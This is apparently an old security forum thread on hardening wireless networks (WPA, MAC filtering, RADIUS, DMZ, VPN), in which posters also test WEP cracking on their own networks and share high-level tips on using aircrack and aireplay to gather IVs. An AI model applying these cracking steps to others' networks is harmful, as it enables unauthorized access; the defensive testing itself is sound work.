Well I am slowly putting in more and more wireless networks and am trying to work out the most secure way to implement them.

From just driving around my local town I am suprised to find the amount of un-encrypted networks that are easily joined. I have been looking into WEP cracking and have now seen that it's easily done (http://www.securityfocus.com/infocus/1814).

I am now looking at WPA-PSK which seems to be better but I have found that you can use dictionary attacks against this wireless encryption.

I currently use 128bit WEP and MAC address filtering but would like to know what else you can implement. Would WPA-PSK be stronger than WEP although for older clients 802.11b networks don't appear to have any WPA capabilities.

So what can you do?

What setup should be used for you to have secure wireless network?

I'd use WPA and MAC filtering unless you can afford to go to EAP-FAST or PEAP, which can be costly and admin intensive. Place your APs outside your firewall so you can block what you can and do extensive logging.

Or VPN in, but even IPSEC VPNs can be hacked.

While these is no secure wireless, put up a good fence so that the attacker will go to the next network and leave yours alone.

Other suggestions, folks?

Well, here's the list I'd use for protecting wifi access

* don't broadcast the SSID (although it still can be discovered when clients are connected to the AP)
* use MAC filters on your AP
* use WPA
* Use an IPSEC VPN (preferably with strong authentication) on top of the wifi access

Dieter

I've seen people implement different wireless (in)security measures, from PEAP to TLS/EAP and WEP/MAC-Filtering. Most require a fair amount of setup, as beardednose mentioned.

IMO, a fair solution to wireless security, at the moment, may lie in implementing a radius server. Radius servers support a variety of security measures, this one just happens to have screenshots of the PEAP implementation.

Unix reference: http://tldp.org/HOWTO/8021X-HOWTO/freeradius.html

Here is a guide to setting WinXP clients to authenticate with your radius server.

Link: http://text.dslreports.com/forum/remark,9286052~mode=flat

Another related link gives you a "play-by-play" in setting up the radius server for allowing EAP/TLS for WinXP clients. Lots of screenshots.

Link: http://www.freeradius.org/doc/EAPTLS.pdf

Ciau..

digitalk2003

Has anyone tested the tools listed in this document. I am fairly well versed with Kismet but I hadn't heard of these newer tools. Of course I probably haven't been paying that much attention with the job change. I am going to use an older laptop and test some of this informaion out. Might be fun, I will post my results if I have any.

I would also recommend looking at wireless as a "least privilege" network. Since we all know that if someone really wants to get in..they'll get in...just plan to be hacked and minimize damage by:

1) Setting up the wireless network as a DMZ...completely separate from desktops, servers, etc. - ISOLATION is key. If they get in..leave them nothing fun to do!
2) Restricting outgoing traffic...perhaps ALL traffic (which leads into the next point)
3) Use an HTTP proxy that requires authentication (for bonus points, have AV protection on the proxy so all content is scanned before being delivered to the browser).

Obviously, use all the suggestions mentioned by others to secure your wireless, but beyond that, use the suggestions above as guidance for minimizing your losses should an unauthorized and malicious user get in.

On my wireless networks, I assume they are 100% compromised (or compromisable) at all times and secure the networks as such.

which doc?

Here's some reading material for you. Wireless Security Vendor Reports,

Exploiting and Protecting 802.11b Wireless Networks,

GIAC Prctical Write-Up,

and also WarDrive Security Links which has a slew of Wireless Security PDF's.

You may want to consider using Share Watch to see whos on what ,as well as AirSnare which is a Wireless IDS.

When 802.11i is sold you'll have a better function for security then you would with the standard wireless available. You can read more about that at NWFusion

If you've been bitten by the wireless bug and want to know whats happening in the wireless world a source of information for you would be Fierce Wireless

Hope this gives you some help regarding what your trying to do. If you have some money burning a hole in your pocket you can look at Wired and Wireless Security For Small Offices

Here we use this:

- WPA 128bit
- put your wireless access points into a DMZ, and have your wireless users tunnel into your network using a VPN
- turn off DHCP
- don't forget to change the default password on your access point or wireless router.
- not only disable SSID broadcast, also rename SSID
- change channel
- disallow administration via wireless
- MAC address filtering

And now we are setting up a radius-server.

btw 802.1X Implementations
http://www.open1x.org/
http://wire.cs.nthu.edu.tw/wire1x/

@ BN From the initial post. (http://www.securityfocus.com/infocus/1814).

Quick update, it took forever to get a 802.11g card to work with kismet. I finally loaded a linux distro with a 2.6 kernel which has support for the prism54 cards built in. Collected 50k worth of encrypted packets and started aircrack against it. 14 hours later still no crack. I realize the number of packets collected is far less than some collected in the examples page. Also hindering my efforts was the fact that no weak IV packets were captured. I will recollect data at work next week. I am sure the sales dept, has a bunch of older nics that will give me better data to work with.

In addition to the items listed, consider...
Any WEP key can be cracked. The more "random" your key is may slightly help but this is really only true against a dictionary attack.

*EAP can be a pain to admin and has it's own security problems.

WPA is vulnerable to a DoS against the entire AP (on most implementations).

RADIUS isn't really going to provide any protection for the data and has to be configured carefully to avoid common mistakes.

IPSec VPNs, SSL VPNs, etc... are good but take time, hardware, and have to be maintained to be effective. Also some are vulnerable to certain MITM attacks.

MAC filtering will stop people from stumbling on to your network but is trivial to defeat.

Disabling SSID broadcast is a best practice but it does not really hide you from anything.

Disallow admin access from wireless network -- one of the best ideas I've heard all day!

DMZ the AP -- another good idea

Can also consider tunneling everything through SSH/SSL tunnels from the end user through the AP to another gateway.

While may of these defenses are marginal, they all should be looked at and considered. There is no real bulletproof way to defend your wireless network besides turning it off. Layer as many of these as possible and you are protecting yourself as much as you can.

Also consider what the importance of the data is and how likely you are of being attacked by someone who knows how to defeat these measures and has the time to be in range of your network and do it.

Alright, I have 100,000 encrypted packets and have been running aircrack for a week with a fudge factor of 4.

Obviously having weak IV's would help. I have to come to the conclusion that crackng WEP isn't as easy as the aforementioned article claims it to be.
I will still play with this but unless anyone here has had success cracking 128 bit keys in a short time period, I am going to come to the conclusion that this information is bogus or there are other mitigating factors at best.

I have also been testing this and not had a great deal of luck with cracking these, I have even used a spare server (not installed it yet cos I wanted a good spec to test things with) and left it cracking a fairly easy ascii wep key (6 chars 1-4 alpha 5-6 numeric) and I haven't had the result turn out yet and I have been running it for 6 days now. Maybe i'll have a result on Monday morning but if not i'm gonna have to terminate it and actually install this server

So has anyone else had any more positive results on cracking WEP?

I'm gonna look more into the radiius server now though.

Here is a quick paper on wireless security. It has a good section about how WPA works.

Wireless Networking for the Paranoid Hacker

Edit:

Heres another paper on ipsec from the same website.

The longest short IP Sec Paper

you have totaly in the good wifi = open world (for your neighbour )

if you use WPA, to improve your security, the password must be a minimum of 20 charaters

anyone heard of Faraday's cage? I was told that banks deploy such solutions is they ever need wireless on the inside ..

Actually... hxxp://www.forcefieldwireless.com/defendair.html

(it's based on the Faraday cage principle)

managed to crack my 128bit WEP key in 12 minutes, this includes packet gathering as well as actual cracking.

Looks like I will have to revisit this when I have time. Mind if I run my test scenario by you when I find that aforementioned time? Thanks in advance.

sure, just let me know when you are ready.

what i can do in the meantime is perhaps point you in the right direction.

the tools i used were all part of the Auditor Linux collection downloadable from:

hxxp://new.remote-security.com

there is also a tutorial on this site that shows u step for step how it can be done.
just check in the "Tutorials" page.

Those were the tools I used. Did you get any weak IV packets?

got a few, then used aireplay to generate alot, really quickly.

which WLAN card are you using?

Thats the difference then. I got absolutely none. I was using netgears 54g card. The version before they went with a non prism chipset. Its fathers day and I intend to spend it with my wife and daughter so I won't get to it today. Most of next week I am onsite writing policies and procedures. I will bring my wireless sniffer onsite with me and play with it during writing breaks. I will let you know how it goes. Thanks for the response.

Success! I was able to crack a 128 bit wep key last night.

I downloaded the latest Auditor CD and loaded it onto the laptops harddrive. Its got aireplay 2.2, apparently 2.1 requires multiple wireless nics. ( I was getting segmentations faults and couldn't figure out why) It took a little longer than 12 minutes, more like 45 minutes to gather 400k IV packets but once that was achieved it cracked the key in 15 seconds.

So what did I learn?
1. Don't run aircrack against your Kismet dump file.
2. Don't even attempt aircrack until you have enough packets.
3. Do use aireplay or some other utility to drive up the number of unique IV's.

@ BN You asked a question some time ago about loading Auditor on the hardrive. It was a piece of cake. I had some issues with the earlier version not booting into the GUI correctly. I simply told it to start manually after I had logged in. The latest version didn't have that issue and the latest version of some tools didn't hurt either.

Now I need to be able to consistently accomplish this and then incorporate it into my security presentations. I imagine this will keep some of our customers from going to Best Buy and actually seeing the need to buy a business class product.

Thanks to all for your input and making me revisit this again, I feel like a kid at Christmas, and as old as I am thats saying something.